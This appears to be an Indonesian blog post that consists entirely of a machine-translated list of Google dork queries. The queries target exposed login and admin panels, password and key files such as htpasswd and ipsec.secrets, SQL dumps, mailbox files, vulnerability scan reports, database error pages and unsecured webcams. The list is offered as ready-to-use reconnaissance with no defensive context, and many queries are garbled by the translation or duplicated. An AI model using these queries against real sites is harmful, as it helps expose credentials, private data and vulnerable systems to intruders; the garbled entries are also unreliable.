intitle: ("TrackerCam Live Video ")|(" TrackerCam Aplikasi Login ")|(" Trackercam Remote")-trackercam.com
intitle: asterisk.management.portal web akses
?. intitle: endymion.sak mail.login.page | inurl: sake.servlet
intitle: Group-Kantor "Masukkan username dan password untuk login"
intitle: ilohamail "
IlohaMail "
intitle: ilohamail intext: "Versi 0.8.10? "
IlohaMail "
intitle: IMP inurl: imp/index.php3
intitle: Masuk * Webmailer
intitle: Login intext: "RT adalah? Hak cipta "
intitle: Node.List Win32.Version.3.11
intitle: Novell intitle: WebAccess "Hak Cipta *-* Novell, Inc"
intitle: buka-Xchange inurl: login.pl
intitle: OVISLINK inurl: private / login
intitle: phpnews.login
intitle: Plesk inurl: login.php3
inurl: "/ admin / konfigurasi. php "Mystore?
inurl: "? / slxweb.dll / eksternal nama = (custportal | webticketcust)"
inurl: "1220/parse_xml.cgi?"
inurl: "631/admin" (inurl: "op =*") | (intitle: CUPS)
inurl: ": 10000? intext: webmin
inurl: "ActiveX / default.htm" "Demo"
inurl: "? calendar.asp action = login"
inurl: "default / login.php" intitle: "Kerio"
inurl: "gs / adminlogin.aspx"
inurl: "php121login.php"
inurl: "suse / login.pl"
inurl: "typo3/index.php u =?"-demo
inurl: "? usysinfo login = true"
inurl: "utilitas / TreeView.asp"
inurl: "vsadmin / login" | inurl:. "vsadmin / admin" inurl:. php | asp
nURL: / admin / login.asp
inurl: / cgi-bin/sqwebmail NOFRAMES = 1?
inurl: / Citrix/Nfuse17 /
inurl: / dana-na/auth/welcome.html
inurl: / eprise /
inurl: / Merchant2/admin.mv | inurl: / Merchant2/admin.mvc | intitle: "MIVA Merchant Login Administrasi"-inurl: murah-malboro.net
inurl: / modcp / intext: Moderator + vBulletin
inurl: / SUSAdmin intitle: "Perangkat Lunak Microsoft upd t?? Layanan "
inurl: / webedit .* intext: WebEdit Profesional-html
inurl: 1810 "Oracle Enterprise Manager"
inurl: 2000 intitle: RemotelyAnywhere-situs: realvnc.com
inurl:: 2082/frontend-demo
inurl: administrator "selamat datang mambo"
inurl: bin.welcome.sh | inurl: bin.welcome.bat | intitle: eHealth.5.0
inurl:? cgi-bin/ultimatebb.cgi UBB = Login
inurl: Citrix / MetaFrame / default / default.aspx
inurl: confixx inurl: login | anmeldung
inurl: coranto.cgi intitle: Masuk (Pengguna Authorized Hanya)
inurl: csCreatePro.cgi
inurl: default.asp intitle: "WebCommander"
inurl: exchweb / bin / auth / owalogon.asp
inurl: gnatsweb.pl
inurl: ids5web
inurl: irc filetype: cgi cgi: irc
inurl: login filetype: swf swf
inurl: login.asp
inurl: login.cfm
inurl: login.php "SquirrelMail versi"
inurl: metaframexp / default / login.asp | intitle: "Metaframe XP Login"
inurl: mewebmail
inurl:? names.nsf OpenDatabase
inurl: ocw_login_username
inurl: orasso.wwsso_app_admin.ls_login
inurl: postfixadmin intitle: "postfix admin" ext: php
inurl: search / admin.php
inurl: Textpattern / index.php
inurl: WCP_USER
inurl: webmail. / index.pl "Interface"
inurl: webvpn.html "login" "Masukkan" Anda
Login ("
Jetbox Satu CMS Ã ¢ Â ¢? "|"
Jetstream? * ")
Novell NetWare intext: "netware manajemen portal versi"
Outlook Web Access (cara yang lebih baik)
PhotoPost PHP Upload
PHPhotoalbum Statistik
PHPhotoalbum Upload
phpWebMail
Silahkan masukkan password yang valid! inurl: polladmin
INDEXU
Ultima Online loginservers
W-nailer Upload Daerah
intitle: "DocuShare" inurl: "docushare / dsweb /"-faq-gov-edu
"# Mysql dump" filetype: sql
"# Mysql dump" filetype: sql 21232f297a57a5a743894a0e4a801fc3
"Allow_call_time_pass_reference" "PATH_INFO"
"Sertifikat Praktek Pernyataan" inurl: (PDF | DOC)
"Dibuat oleh phpSystem"
"Dihasilkan oleh wwwstat"
"Host Vulnerability Summary Report"
"HTTP_FROM = Googlebot" googlebot.com "Server_Software ="
"Index of" / "chatting / log"
"Objek Scanner Dipasang" inurl: default.asp
"MacHTTP" filetype: log inurl: machttp.log
"Mecury Versi" "Infastructure Grup"
"Microsoft (R) Windows * (TM) Versi * Drwtsn32 Hak Cipta (C)" ext: log
"Bentuk Kebanyakan Dikirimkan dan s ri?? Ts" "bagian ini"
"Jaringan Laporan Penilaian Kerentanan"
"Tidak untuk distribusi" rahasia
"Bukan untuk rilis publik" -. -. edu gov -. juta
"Telepon * * *" "alamat *" "e-mail" intitle: "curriculum vitae"
"PhpMyAdmin" "yang berjalan di" inurl: "main.php"
"Diproduksi oleh getstats"
"Permintaan Rincian" "Kontrol Pohon" "Variabel Server"
"Robots.txt" "Disallow:" filetype: txt
"Menjalankan dalam mode Anak"
"Set mode: + p"
"Set mode: + s"
"Terima kasih atas pesanan Anda" + penerimaan
"Ini adalah Shareaza Node"
"Laporan ini dihasilkan oleh Weblog"
(Filetype: mail | filetype: eml | filetype: mbox | filetype: MBX) intext: sandi | subjek
(Intitle: "PRTG Traffic Grapher" inurl: "allsensors") | (intitle: "PRTG Traffic Grapher - Hasil Pemantauan")
(Intitle: WebStatistica inurl: main.php) | (intitle: "WebSTATISTICA server")-inurl: statsoft-inurl: statsoftsa-inurl: statsoftinc.com-edu-software-rob
(Inurl: "robot.txt" | inurl: "robots.txt") intext: melarang filetype: txt
+ ": 8080? + ": 3128? + ": 80? filetype: txt
+ "HSTSNR" - "netop.com"
-Situs: php.net - "Grup PHP" inurl: inurl sumber: url ext: php
94FBR "ADOBE PHOTOSHOP"
AIM daftar teman
allinurl: / contoh / jsp / SNP / snoop.jsp
allinurl: cdkey.txt
allinurl: servlet / SnoopServlet
cgiirc.conf
cgiirc.conf
kontak ext: wml
Data filetype: mdb-site: gov-site: mil
diekspor alamat email
ext: (doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | pdf | pps | xml) (intext: gaji rahasia | intext: "anggaran yang disetujui") inurl: rahasia
ext: asp inurl: pathto.asp
ext: ccm ccm-katakombe
ext: CDX CDX
ext: cgi inurl: editcgi.cgi inurl: file =
ext: inurl conf: rsyncd.conf-cvs-orang
ext: conf NoCatAuth-cvs
ext: dat bpk.dat
ext: gho gho
ext: ics ics
ext: intext ini: env.ini
ext: jbf jbf
ext: ldif ldif
ext: log "Software: Microsoft Internet Information Services *.*"
ext: mdb inurl: *. mdb inurl: fpdb shop.mdb
ext: NSF NSF-gov-mil
ext: Plist filetype: Plist inurl: bookmarks.plist
ext: PQI PQI-database
ext: reg "username =*" dempul
ext: txt "kunci enkripsi Akhir"
ext: txt inurl: dxdiag
ext: vmdk vmdk
ext: vmx vmx
filetype: asp DBQ = "* Server.MapPath (" *. mdb ")
filetype: BKF BKF
filetype: BLT "buddylist"
filetype: BLT BLT + intext: screenname
filetype: cfg auto_inst.cfg
filetype: CNF inurl: _vti_pvt access.cnf
filetype: conf inurl: firewall-intitle: cvs
filetype: config web.config-CVS
filetype: CTT Kontak
filetype: CTT CTT utusan
filetype: eml eml + intext: "Subject" + intext: "Dari" + intext: "Untuk"
filetype: fp3 fp3
filetype: fp5 fp5-site: gov-site: mil - "cvs log"
filetype: FP7 FP7
filetype: inf inurl: capolicy.inf
filetype: lic lic intext: kunci
filetype: log access.log-CVS
filetype: log cron.log
filetype: MBX MBX intext: Perihal
filetype: MYD MYD-CVS
filetype: ns1 ns1
filetype: ora ora
filetype: TNSNAMES ora
filetype: pdb pdb cadangan (Percontohan | Pluckerdb)
filetype: php inurl: index inurl: phpicalendar-site: sourceforge.net
filetype: panci inurl: john.pot
filetype: PS ps
filetype: pst inurl: "Outlook.pst"
filetype: pst pst-dari-to-date
filetype: qbb qbb
filetype: QBW qbw
filetype: rdp rdp
filetype: reg "Terminal Client Server"
filetype: vcs vcs
filetype: wab wab
filetype: xls-site: gov inurl: kontak
filetype: xls inurl: "email.xls"
Keuangan spreadsheet: finance.xls
Keuangan spreadsheet: finances.xls
Cluster ganglia Laporan
haccess.ctl (satu cara)
haccess.ctl (SANGAT diandalkan)
ICQ chatting log, silahkan ...
intext: "Mulai Sesi * * * * *:*:*" filetype: log
intext: "Tobias Oetiker" "analisis lalu lintas"
intext: (password | passcode) intext: (username | userid | pengguna) filetype: csv
intext: gmail mengundang intext: http://gmail.google.com/gmail/a
intext: SQLiteManager inurl: main.php
intext: ViewCVS inurl: settings.php
intitle: "admin panel" + "
RedKernel "
intitle: "Apache:: Status" (inurl: server-status | inurl: status.html | inurl: apache.html)
intitle: "Proyek AppServ Open"-site: www.appservnetwork.com
intitle: "ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"
intitle: "Big Sister" + "OK Perhatian Masalah"
intitle: "curriculum vitae" filetype: doc
intitle: "Edna: Streaming mp3 server"-forum
intitle: "root FTP di"
intitle: "index of" ukuran + MYD
intitle: "Index Of"-inurl: maillog maillog ukuran
intitle: "Index Of" ukuran cookies.txt
intitle: "index of" mysql.conf ATAU mysql_config
intitle: "Index of" ukuran direktori induk meng-upload
intitle: "index.of *" admin news.asp configview.asp
intitle:.. "index.of" diz nfo terakhir diubah
intitle: "Joomla - Web Installer"
intitle: "LOGREP - Log file sistem pelaporan"-site: itefix.no
intitle: "Multimon UPS halaman status"
intitle: "PHP transfer Lanjutan" (inurl: index.php | inurl: showrecent.php)
intitle: "PhpMyExplorer" inurl: "index.php"-cvs
intitle: "statistik" "lanjutan web statistik"
intitle: "Sistem Statistik" + "Sistem dan Pusat Jaringan Informasi"
intitle: "landak (5 | 3 | admin)" ext: cgi
intitle: "Statistik pengaksesan untuk" "Generated by Webalizer"
intitle: "WBEM" compaq login "Compaq Informasi Technologies Group"
intitle: "Statistik Web Server untuk ****"
intitle: "Web server status" SSH Telnet
intitle: "Selamat datang di F-Secure Kebijakan Halaman Server Manager Selamat Datang"
intitle: "welcome.to.squeezebox"
intitle: admin intitle: login
intitle: inurl Bookmarks: bookmarks.html "Bookmarks
intitle: index.of "Apache" "server di"
intitle: index.of cleanup.log
intitle: index.of dead.letter
intitle: index.of kotak masuk
intitle: index.of kotak masuk dbx
intitle: index.of ws_ftp.ini
intitle: intranet inurl: intranet + intext: "telepon"
inurl:? "/ AXS / kapak-admin.pl"-s ri t?
inurl: "/ cricket / grapher.cgi"
inurl: "bookmark.htm"
inurl: "cacti" + inurl: "graph_view.php" + "Pengaturan Pohon Lihat"-cvs-RPM
inurl: "newsletter / admin /"
inurl: "newsletter / admin /" intitle: "admin buletin"
inurl: "putty.reg"
inurl: "smb.conf" intext: "workgroup" filetype: conf conf
inurl: * db filetype: mdb
inurl: / cgi-bin/pass.txt
inurl: / _layouts / pengaturan
inurl: admin filetype: xls
inurl: admin intitle: login
inurl: backup filetype: mdb
inurl: build.err
inurl: cgi-bin/printenv
inurl: cgi-bin/testcgi.exe "Silahkan mendistribusikan TestCGI"
inurl: changepassword.asp
inurl: ds.py
inurl: email filetype: mdb
inurl: fcgi-bin/echo
inurl: Forum filetype: mdb
inurl: maju filetype: maju-cvs
inurl: getmsg.html intitle: hotmail
inurl: log.nsf-gov
inurl: main.php phpMyAdmin
inurl: main.php Selamat Datang di phpMyAdmin
inurl: netscape.hst
inurl: netscape.hst
inurl: netscape.ini
inurl: odbc.ini ext: ini-cvs
inurl: perl / printenv
inurl: php.ini filetype: ini
inurl: preferences.ini "[emule]"
inurl: profil filetype: mdb
inurl: Laporan "Everest Home Edition"
inurl: server-info "Apache Server Information"
inurl: server-status "apache"
inurl: snitz_forums_2000.mdb
inurl: filetype ssl.conf: conf
inurl: tdbin
inurl: vbstats.php "halaman yang dihasilkan"
inurl: wp-mail.php + ". Ada sepertinya tidak akan ada mail baru"
inurl: XcCDONTS.asp
ipsec.conf
ipsec.secrets
ipsec.secrets
Lotus Domino buku alamat
email filetype: csv-site: gov intext: nama
File data Microsoft Money
mt-db-pass.cgi file
MySQL dumps tabledata
mystuff.xml - Trillian file data
OWA Publik Folder (melihat langsung)
Penduduk daftar kontak MSN
php-addressbook "Ini adalah addressbook untuk *" peringatan
phpinfo ()
phpMyAdmin dumps
phpMyAdmin dumps
kunci pribadi file (. CSR)
kunci pribadi file (. kunci)
Quicken file data
rdbqds-site:. edu-situs:. mil-site:. gov
robots.txt
site: edu nilai admin
situs: www.mailinator.com inurl: ShowMail.do
Data SQL dumps
Squid cache server laporan
Unreal IRCd
Weblog Acuan
Selamat Datang ntop!
? Fichier contenant sur le des informasi r seau:
filetype: log intext: "ConnectionManager2?
"Aprikot - admin" 00h
"Oleh Reimar Hoven. All Rights Reserved. Disclaimer "| inurl:" log / logdb.dta "
"Laporan Penilaian Network Host" "Scanner internet"
"Output yang dihasilkan oleh * SysWatch"
"Phorum Admin" "Koneksi Database" inurl: forum inurl: admin
phpOpenTracker "Statistik
"Bertenaga | dilakukan oleh Scanning Otomatis luar Keamanan"-Kazaa-contoh
"Shadow Security Scanner melakukan penilaian kerentanan"
"SnortSnarf Halaman waspada"
"Laporan berikut berisi informasi rahasia" kerentanan-search
"Statistik yang terakhir upd t?? D" "Harian"-microsoft.com
"Proxy ini bekerja dengan baik!" "Masukkan *" "URL ***" * kunjungi
"Laporan ini berisi" "diidentifikasi oleh Scanner internet"
"Analisis Lalu Lintas untuk" * "Port RMON pada * Unit"
"Versi Info" "Boot Version" "Internet Pengaturan"
((Inurl: ifgraph "Halaman dibuat di") ATAU ("Halaman ini dibangun menggunakan ifgraph"))
Analisis Console untuk Database Insiden
ext: cfg radius.cfg
ext: cgi intext: "NRG-" "Halaman web ini dibuat pada"
filetype: pdf "Assessment Report" nessus
filetype: php inurl: ipinfo.php "Distributed Intrusion Detection System"
filetype: php inurl: nqt intext: "Jaringan Alat Query"
filetype: VSD VSD jaringan-sampel-contoh
intext: "Selamat datang di Jaringan V. Web" intitle: "V. Jaringan [Top]"-filetype: htm
intitle: "ADSL halaman Konfigurasi"
intitle: "Azureus: Jawa BitTorrent Tracker Klien"
intitle: "Belarc Advisor Current Profile" intext: ". Klik di sini untuk produk Manajemen Belarc PC, untuk perusahaan besar dan kecil"
intitle: "BNBT Tracker Info"
intitle: "Microsoft Analisis Server Situs"
intitle: "Nessus Laporan Scan" "file ini dihasilkan oleh Nessus"
intitle: "Statistik PHPBTTracker" | intitle: "PHPBT Statistik Tracker"
intitle: "Laporan Retina" "INFORMASI RAHASIA"
intitle: "start.managing.the.device" remote PBX acc
intitle: "sysinfo *" intext: "Dihasilkan oleh * Sysinfo ditulis oleh The Gamblers."
intitle: "TWiki" inurl: "TWikiUsers"
inurl: "/ catalog.nsf" intitle: katalog
inurl: "install / install.php"
inurl: "? map.asp" intitle: "WhatsUp Gold"
inurl: "NmConsole / login.asp" | intitle: "Masuk - Ipswitch WhatsUp Profesional 2005? | Intext: "Ipswitch WhatsUp Profesional 2005 (SP1)" "Ipswitch, Inc"
inurl: "sitescope.html" intitle: "sitescope" intext: "refresh"-demo
inurl: / adm-cfgedit.php
inurl: / cgi-bin/finger? "Dalam kehidupan nyata"
inurl: / cgi-bin/finger? Masukkan (akun | host | pengguna | username)
inurl: / counter / index.php intitle: "+ PHPCounter 7 .*"
inurl: CrazyWWWBoard.cgi intext: "informasi rinci debug"
inurl: login.jsp.bak
inurl: ovcgi / jovw
inurl: phpSysInfo / "yang diciptakan oleh phpsysinfo"
inurl: portscan.php "dari Port" | "Rentang Port"
inurl: Proxy | inurl: wpad ext: pac | ext: dat findproxyforurl
inurl: statrep.nsf-gov
inurl:? status.cgi host = semua
inurl: testcgi xitami
inurl: Webalizer filetype: png -. -. edu gov -. mil-opendarwin
inurl: webutil.pl
Kaca
situs: netcraft.com intitle: That.Site.Running Apache
"Sebuah kesalahan telah terjadi sintaks" filetype: ihtml
"Akses ditolak untuk pengguna" "menggunakan password"
"Sebuah karakter ilegal telah ditemukan dalam pernyataan" - "pesan sebelumnya"
"ASP.NET_SessionId" "data source ="
"Tidak dapat terhubung ke lokal" intitle: peringatan
"Chatologica metasearch" "pelacakan stack"
"Terdeteksi kesalahan internal [IBM] [CLI driver] [DB2/6000]"
"Kesalahan yang ditemukan menangani permintaan" kepompong filetype: xml
"Fatal error: Pemanggilan fungsi tidak terdefinisi"-reply-next-
"Salah sintaks dekat"
"Salah sintaks dekat"
"Internal Server Error" "server di"
"Invision Power database Kesalahan Dewan"
"ORA-00933: perintah SQL tidak benar berakhir"
"ORA-12541: TNS: pendengar tidak" intitle: "kesalahan terjadi"
"Parse error: parse error, T_VARIABLE tak terduga" "on line" filetype: php
"Query PostgreSQL gagal: ERROR: parser: error"
"Argumen Disediakan bukan sebuah hasil resource MySQL yang valid"
"Sintaks kesalahan dalam ekspresi query"-yang
"Para s ri?? T yang uid adalah" "tidak diperbolehkan untuk mengakses"
"Ada tampaknya telah masalah dengan" "Silakan coba lagi dengan mengklik tombol Refresh di browser web Anda."
"Tidak dapat melompat ke baris" "pada indeks hasil MySQL" "on line"
"Tertutup tanda kutip sebelum karakter string"
"Peringatan: argumen Buruk untuk (bergabung | meledak) () dalam" "on line"-forum bantuan-
"Peringatan: Tidak dapat memodifikasi informasi header - header sudah dikirim"
"Peringatan: Divisi oleh nol dalam" "on line"-forum
"Warning: mysql_connect (): Access denied for user:'*@*"" on line "-help-forum
"Peringatan: mysql_query ()" query "tidak valid"
"Peringatan: pg_connect (): Tidak dapat terhubung ke server PostgreSQL: FATAL"
"Peringatan: argumen yang diberikan bukanlah sumber daya-File Menangani berlaku di"
"Peringatan:" "failed to open stream: HTTP request gagal" "on line"
"Peringatan:". "Pembatasan SAFE MODE efek" "? S ri t yang uid itu?" "Tidak diizinkan untuk mengakses dimiliki oleh uid 0 dalam" "on line"
"SQL Server driver] [SQL Server] Line 1: Salah sintaks dekat"
Sebuah token yang tak terduga "AKHIR-OF-PERNYATAAN" ditemukan
ColdFusion Kesalahan Halaman
filetype: asp + "[ODBC SQL"
filetype: asp "Kesalahan Pesan Kustom" Sumber Kategori
filetype: log "PHP Parse error" | "PHP Peringatan" | "PHP Error"
filetype: php inurl: "logging.php" "Discuz" kesalahan
ht: / / Dig htsearch kesalahan
IIS 4.0 kesalahan pesan
IIS web server error pesan
Internal Server Error
intext: "Pesan Kesalahan: Kesalahan memuat perpustakaan diperlukan."
intext: "Peringatan: Gagal membuka" "on line" "include_path"
intitle: "Apache Tomcat" "Laporan Error"
intitle: "Default Plesk Halaman"
intitle: "Kesalahan Terjadi Sementara Pengolahan Permintaan" + WHERE (SELECT | INSERT) filetype: cfm
intitle: "Kesalahan Terjadi" "Kesalahan terjadi pada" filetype: cfm
intitle: "Kesalahan menggunakan Hypernews" "Server Software"
intitle: "?? Eksekusi s t ri ini tidak diijinkan"
intitle: "Dalam konstruksi" "saat ini tidak memiliki"
intitle: Configuration.File inurl: softcart.exe
MYSQL pesan kesalahan: argumen yang diberikan ....
mysql error dengan permintaan
Netscape Aplikasi Server Error halaman
ORA-00921: end tak terduga dari perintah SQL
ORA-00921: end tak terduga dari perintah SQL
ORA-00936: ekspresi hilang
Aplikasi PHP peringatan gagal "include_path"
sitebuildercontent
sitebuilderfiles
sitebuilderpictures
Snitz! forum db jalan kesalahan
SQL syntax error
Argumen yang diberikan bukanlah hasil PostgreSQL yang valid
peringatan "kesalahan pada baris" php sablotron
Windows 2000 server error pesan web
"Ftp://" "www.eastgame.net"
"Html diperbolehkan" buku tamu
: VBulletin Version 1.1.5?
"Pilih database untuk melihat" intitle: "filemaker pro"
"Mengatur pengguna administrator" inurl: poros
"Tidak ada Administrator Account" inurl: admin.php-mysql_fetch_row
"Selamat Datang Administrasi" "Umum" "Domain Lokal" "Otentikasi SMTP" inurl: admin
"Selamat Datang di Intranet"
"Selamat Datang di PHP-Nuke" selamat
"Selamat datang Prestige Web Berbasis Configurator"
"YaBB SE Dev Team"
"Anda sekarang dapat password" | "ini adalah halaman khusus yang hanya terlihat oleh Anda. pengunjung profil Anda "inurl: imchaos
("Indexed.By" | "Monitored.By") hAcxFtpScan
(Inurl: / shop.cgi / halaman =) | (inurl: / shop.pl / halaman =)
allinurl: "index.php" "situs = sglinks"
allinurl: install / install.php
allinurl: admin intranet
filetype: cgi inurl: "fileman.cgi"
filetype: cgi inurl: "Web_Store.cgi"
filetype: php inurl: vAuthenticate
filetype: pl intitle: "Ultraboard Setup"
Galeri dalam mode konfigurasi
Hassan Consulting Belanja Versi 1,18
intext: "Peringatan: * masih bisa * ** menulis file konfigurasi" "includes / configure.php" -
intitle: "Menu Konfigurasi Gateway"
intitle: "Horde:: My Portal" - "[Tiket"
intitle: "Mail Server CMailServer Webmail" "5,2?
intitle: "MvBlog bertenaga"
intitle: "Web Desktop Connection Remote"
intitle: "Samba Web Administration Tool" intext: "Bantuan Workgroup"
intitle: "Terminal Connection Web Services"
intitle: "Uploader - Uploader v6? -Pixloads.com
intitle: osCommerce inurl: admin intext: "diredistribusi di bawah GNU" intext: "Katalog Online"-demo-site: oscommerce.com
intitle: phpMyAdmin "Welcome to phpMyAdmin ***" "berjalan di * sebagai root @ *"
intitle: phpMyAdmin "Welcome to phpMyAdmin ***" "berjalan di * sebagai root @ *"
inurl: "/ NSearch / AdminServlet"
inurl: "index.php? modul = ew_filemanager "
inurl:? aol * / _do / rss_popup blogID =
inurl: footer.inc.php
inurl: info.inc.php
inurl: ManyServers.htm
inurl: newsdesk.cgi? inurl: "t ="
inurl: pls / admin_ / gateway.htm
inurl: rpSys.html
inurl: search.php vBulletin
inurl: servlet / webacc
natterchat inurl: home.asp-situs: natterchat.co.uk
Instalasi XOOPS
inurl: filetype htpasswd: htpasswd
inurl: yapboz_detay.asp + Lihat Webcam Mengakses Pengguna
allinurl: kontrol / Multiview
inurl: "? viewerframe Mode ="
intitle: "WJ-NT104 Halaman Utama"
inurl: netw_tcp.shtml
intitle: "supervisioncam protokol"
intitle: "Terminal Connection Web Services"
intitle: "Uploader - Uploader v6? -Pixloads.com
intitle: osCommerce inurl: admin intext: "diredistribusi di bawah GNU" intext: "Katalog Online"-demo-site: oscommerce.com
intitle: phpMyAdmin "Welcome to phpMyAdmin ***" "berjalan di * sebagai root @ *"
intitle: phpMyAdmin "welcome to phpMyAdmin
Langganan:
Postingan (Atom)